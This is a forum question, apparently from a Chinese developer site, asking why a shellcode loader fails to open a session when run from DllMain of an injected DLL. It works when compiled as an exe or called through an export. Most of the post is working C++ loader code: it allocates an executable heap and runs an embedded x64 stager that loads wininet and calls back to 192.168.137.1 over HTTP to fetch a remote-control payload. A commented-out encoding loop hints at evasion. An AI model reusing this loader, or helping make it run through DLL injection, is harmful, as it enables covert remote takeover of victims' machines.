首页 新闻 会员 周边

shellcodeloader代码写入dllmain中无法成功上线session

0
悬赏园豆:10 [待解决问题]

1.以下代码如果直接写入main函数下,然后编译成exe,可以实现上线
2.如果写入dllmain函数下面,我使用dll注入或者运行某个进程调用该dll均为上线session,且调试查看每个api均是成功执行且shellcode成功载入堆中,不知为何没有成功运行上线
3.但是如果编写一个项目包含exe和dll,在dll的导出函数中写入下面代码不在dllmain里面写入,并使用exe调用导出函数,是可以成功运行并上线的

总之就是感觉很奇怪,也不明所以,对堆的知识也不是特别了解

    LPVOID heap;
    heap = HeapCreate( HEAP_CREATE_ENABLE_EXECUTE, 0, 0);


    char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6d\x4b\x51\x54\x00\xa7\xcc\xac\x17\x18\x11\x9c\x8f\xd9\x2a\x83\x88\xfd\x03\x8b\xd4\xab\x26\x0a\xd8\x7d\x29\x73\x4c\xf0\x57\x21\x23\x86\xcf\x45\x5e\x3e\xad\xaf\xb6\x0c\x43\x4d\x7a\x7b\xd2\x65\x35\x22\xf5\xe3\xad\xac\xce\x8a\x68\xb9\xf0\x31\x28\x5f\xd8\x52\x52\x6c\xc8\x2d\x74\xa3\x38\xe9\x39\xae\xa7\xa7\x1b\x3a\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4d\x44\x44\x52\x4a\x53\x29\x0d\x0a\x00\x96\xc1\x86\x46\x9d\x43\x32\xef\x1c\x0b\x57\xf4\xaa\xd7\x89\xcc\xcc\x37\x78\xa7\x3c\xa3\xeb\x68\xcb\x3f\xc4\xa7\x81\xca\xa0\xcd\x44\x8c\x18\xe6\x04\x07\x1a\x1c\x1c\x85\xd2\x06\xd7\xf4\x80\xd5\x1b\xf9\xc1\xf2\x31\x15\x06\x20\x8e\x04\xb1\x8c\x0a\xb5\x80\xca\x4f\xf2\x34\xde\xe9\xe4\xa6\x32\xb2\x06\x88\x34\xed\xd0\x7c\xbb\x3c\x82\x6e\x4d\xc4\x7f\x73\x52\x60\xe3\xb3\x1a\x2a\x54\x80\x39\x8c\x77\x7d\x35\xe4\xe8\xd7\x49\x85\x64\x04\x85\xc2\x79\xd8\xf1\x65\x16\x2a\x8a\x73\xf8\x21\x69\x9d\x99\x7e\xf8\x46\x99\x11\x48\xc9\x37\x15\xd8\x85\x9a\x95\xa5\x29\x73\xb8\xca\x29\xb3\xf6\xa7\xb0\x3c\x60\xa1\xf5\x7a\xbc\x0f\x7a\xce\x00\x5b\xf9\xca\xf3\x2a\x36\x8a\x2c\xd3\x85\x8a\x55\x1a\x6a\xd9\x31\x08\x40\x55\x8c\x0b\xf1\x2a\x5e\x4b\x15\x1f\x41\xf6\x88\xf6\xa9\x33\x68\x4a\x8a\x2c\xba\x89\x2e\x1c\xe8\x2f\x1d\x98\x9e\xa9\x76\xca\x54\xc7\xfa\x86\x9c\x34\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x37\x2e\x31\x00\x5e\x2e\x78\x90";
 

    //第三个设置为0则默认运行的堆大小
 
    
 
    int size = sizeof(shellcode);//size
    cout << size;
    LPVOID ptr = HeapAlloc(heap, HEAP_ZERO_MEMORY, size);
    int x = GetLastError();
    cout << x;
    /*
    for (int i = 0; i < size; i++) {
        shellcode[i] = (shellcode[i] - 1) ^ i;
    }
    */

    memcpy(ptr, shellcode, sizeof shellcode);


    HANDLE A=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);


    while (1)
    {
        Sleep(8000);
    }
mortal-kirito的主页 mortal-kirito | 初学一级 | 园豆:186
提问于:2022-07-25 16:03
< >
分享
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册